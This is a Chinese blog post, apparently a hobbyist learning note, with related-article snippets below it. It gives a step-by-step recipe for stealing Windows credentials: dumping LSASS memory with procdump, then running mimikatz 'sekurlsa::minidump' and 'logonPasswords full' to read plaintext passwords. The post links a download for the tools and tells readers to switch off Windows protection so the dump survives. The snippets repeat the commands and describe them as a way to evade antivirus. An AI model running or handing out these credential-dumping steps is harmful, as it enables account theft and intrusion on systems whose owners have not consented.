利用procdump+mimikatz读取windows系统中的密码

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量3.3k 收藏 7
点赞数
文章标签: windows 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LUOBIKUN/article/details/108458804
版权

今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。

工具我也都整理好了,

链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg

提取码:b1q6

procdump,可以将lsass进程的内存文件导出来;

mimikatz,可以对导出的内存文件进行分析,从而获取密码。

1,管理员权限打开cmd

procdump64.exe-accepteula -ma lsass.exe lsass.dmp

//导出为lsass.dump文件

在这里插入图片描述

2,管理员权限打开mimikatz.exe

执行

privilege::debug //提升权限

在这里插入图片描述
在这里插入图片描述

3,管理员权限打开cmd

把lsass.dmp放在mimikatz目录利用

mimikatz.exe"sekurlsa::minidump lsass.dmp" “sekurlsa::logonPasswordsfull” exit

最后成功读取了密码:
在这里插入图片描述

需要注意的是,要把windows系统的自动防护关了,不然电脑会将生成的内存文件自动删掉…

Oriental r0se
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Procdump+Mimikatz获取Windows明文密码
SheXinK’s Blog
11-10 2452
Procdump+Mimikatz获取Windows明文密码1 测试环境2 抓取密码 2.1 Server 2008 R2抓取  2.1.1 生成存储文件  2.1.2 mimiakatz密码获取 2.2 Server 2012 R2抓取  2.1.1 修改注册表  2.1.2 mimiakatz密码获取 1 测试环境  系统:   Server 2008 R2   Server 2012 R2 ...
procdump+mimikatz.zip
11-14
mimikatz是由法国安全研究员Benjamin Delpy开发的开源工具,主要用于获取Windows系统的敏感信息,如明文密码、kerberos票证、LSA(本地安全机构)秘密等。mimikatz因其强大的信息收集能力,常常被安全研究人员用于...
ATT&CK-T1003-001-操作系统凭据转储:LSASS内存
swordheart的博客
12-07 964
攻击者可能会尝试访问存储在本地安全机构子系统服务 (LSASS) 进程内存的凭证材料。用户登录后,系统生成各种凭证材料,存储在LSASS进程内存。这些凭证材料可以由管理用户或 SYSTEM 获取,并用于使用使用备用身份验证材料 进行横向移动 。与内存技术一样,LSASS 进程内存可以从目标主机转储并在本地系统上进行分析。例如,在目标主机上使用 procdump: 在本地,可以使用以下方式运行 mimikatz: 也可以使用内置的 Windows 工具,例如 comsvcs.dll: W
利用Procdump+Mimikatz获取Windows帐户密码
cj_Hydra's Blog
01-29 1005
复现过程 导出lsass.exe 首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器能看到,这里用到微软官方发布的工具Procdump导出lsass.exe,所以不存在被杀软拦截的情况: 上传文件procdump64.exe到可执行目录,执行下面语句: procdump64.exe -accepteula -ma lsass.exe lsass.dmp ...
mimkatz获取windows10明文密码
banliyaoguai的博客
05-31 864
Windows 10或更高版本的系统,默认情况下,操作系统会在内存缓存禁止保存明文密码。然后,再次使用mimikatz等工具读取lsass.exe进程的内存,即可获取到明文密码mimikatz通过注入代码到操作系统的内存,能够读取和解密这些由lsass.exe进程保存的加密凭证。具体的操作是,mimikatz利用管理员权限执行一些操作,如使用procdump等工具lsass.exe进程转储成一个dmp文件。当用户登录时,lsass.exe会使用一个可逆的算法加密明文密码,并将密文保存在内存
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 604
Mimikatz是从lsass.exe提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
密码抓取--Prodump+Mimikatz抓取windows系统密码
网络安全。
02-13 1363
1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。 query user 2、查看目标系统版本。 wmic OS get Caption,OSArchitecture 3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件procdump64.exe -accepteula -ma lsass.exe lsass.dmp...
Procdump+mimikatz绕过安全防护读取密码
xxx9686的博客
09-16 329
在我们提权过程经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。Procdump是微软自家的外部工具,其主要目的是监视应用程序的CPU尖峰并在尖峰期间生成崩溃转储。运行后将会保存lsass到本地,我们可以将该文件拖动到物理机,使用mimikatz对其密码查看。使用procdump转储lsass进程。
procdump + mimikatz 获取window10系统密码的方法
onlyfunboy的专栏
06-17 1286
1,管理员权限打开cmd,进入对应目录 procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件 2,管理员权限打开mimikatz.exe 执行privilege::debug; 3,管理员权限打开cmd,进入对应目录 把lsass.dmp放在mimikatz目录利用 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit .
内网渗透-Mimikatz+Procdump的使用
weixin_60830484的博客
04-24 517
在内网渗透,获取目标明文密码是必不可少的一部分,可以扩大"攻击面",因此本文将讲解相关工具的使用以及原理。
procdumpmimikatz联动
weixin_45715461的博客
06-30 695
procdumpmimikatz联动
procdump32_64+mimikatz.rar
06-15
标题的"procdump32_64+mimikatz.rar"表明这是一个包含32位和64位版本的procdump工具与mimikatz工具的压缩包。这两个工具在IT安全领域有着重要的作用,特别是对于系统调试和安全审计。 **procdump** Procdump是...
Procdump密码读取.zip
04-16
标题“Procdump密码读取.zip”提示我们这个压缩包涉及的是一个名为...对于那些不熟悉这个工具的人来说,提供的文本文件将是一个宝贵的资源,可以帮助他们了解如何利用Procdump安全有效地读取和分析内存密码信息。
procdump配合密码获取
04-03
描述提到的"配合密码获取"可能是指在特定情况下,利用Procdump获取进程包含密码的信息。这可能涉及到了安全漏洞,比如如果一个进程无意在内存存储了明文密码Procdump可以被用来创建该进程的内存转储,然后...
Windows下用于生成Dump文件的工具
04-04
Windows操作系统环境,当开发者遇到难以复现的CPU性能问题或者程序崩溃时,需要一种有效的方式来收集和分析程序运行时的状态。"Windows下用于生成Dump文件的工具"就是为了解决这一问题而存在的。该工具名为...
2024.7.19 作业
qq_64434282的博客
07-19 3046
【代码】2024.7.19 作业。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1568
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
2024浙江省行政区划矢量图层-省市县乡镇四级行政区划数据下载-带python代码
最新发布
08-02
2024最新浙江省行政区划矢量图层数据,包含省、市、县、乡镇四级行政区划数据下载,附带shp转geojson的python代码
procdump命令行安装
05-19
Procdump是一个Windows实用程序,它可以监视一个进程的活动,并在发生特定条件时将其转储到磁盘。Procdump还可以通过在命令行指定选项来监视多个进程。 以下是在命令行安装Procdump的步骤: 1. 下载Procdump工具。您可以从Microsoft官方网站上下载Procdump:https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 2. 将Procdump.exe文件复制到您想要使用它的计算机上的某个位置,例如C:\Windows\System32。 3. 在命令提示符处打开Procdump.exe的位置。 4. 运行以下命令来显示Procdump的帮助信息: ``` procdump.exe -h ``` 5. 如果您想要将Procdump添加到系统路径,以便在任何位置都可以使用它,请按Win + R键打开运行对话框,输入"sysdm.cpl",然后在“高级”选项卡下单击“环境变量”。在“系统变量”区域,选择“Path”变量,然后单击“编辑”。将Procdump所在的文件夹路径添加到变量值列表,然后单击“确定”。 现在您已经成功安装了Procdump,并可以在命令行使用它来监视进程并生成转储文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值